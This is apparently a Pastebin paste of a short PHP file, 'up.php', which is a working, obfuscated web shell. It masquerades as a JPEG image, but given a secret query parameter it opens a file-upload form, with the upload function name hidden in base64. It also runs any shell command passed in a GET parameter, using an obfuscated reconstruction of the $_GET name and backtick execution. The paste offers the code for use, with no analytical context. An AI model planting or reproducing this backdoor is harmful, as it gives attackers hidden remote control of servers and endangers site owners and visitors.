Advertisement
Guest User

up.php

a guest
Oct 16th, 2019
74
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.10 KB | None | 0 0
  1. <?php
  2.     if (!empty($_GET["13"]) && $_GET["13"] == "37") {
  3.         echo "<font face=\"Courier New\">";
  4.         echo "<form method=\"POST\" enctype=\"multipart/form-data\"><input type=\"file\" name=\"filetoupload\"><input type=\"submit\" name=\"upload\"></form>";
  5.         if(!empty($_POST["upload"])) {
  6.             $muf = @base64_decode("bW92ZV91cGxvYWRlZF9maWxl=");
  7.             if(@$muf($_FILES["filetoupload"]["tmp_name"], $_FILES["filetoupload"]["name"])) {
  8.                 echo "[ <a target=\"_blank\" href=\"".$_FILES["filetoupload"]["name"]."\">SUCCESS</a> ]";
  9.             }
  10.             else {
  11.                 echo $_FILES["filetoupload"]["error"];
  12.             }
  13.         }
  14.         else {
  15.             echo "[ NO RESULT ]";
  16.         }
  17.  
  18.         $joker = @range("A","Z");
  19.         $joker = $joker[6].$joker[4].$joker[19];
  20.         if(!empty(${"_".$joker}["1337"])) {
  21.             echo "<pre>".@htmlspecialchars(`${"_".$joker}["1337"]`)."</pre>";
  22.         }
  23.         echo "</font>";
  24.     }
  25.     else {
  26.         @header("Content-Type: image/jpeg");
  27.         $icfjpeg    = @base64_decode("aW1hZ2VjcmVhdGVmcm9tanBlZw==");
  28.         $ijpeg      = @base64_decode("aW1hZ2VqcGVn");
  29.         @$ijpeg(@$icfjpeg("https://assets-a2.kompasiana.com/items/album/2018/09/25/joker-5baa1bc212ae94284577b763.jpg"));
  30.     }
  31. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement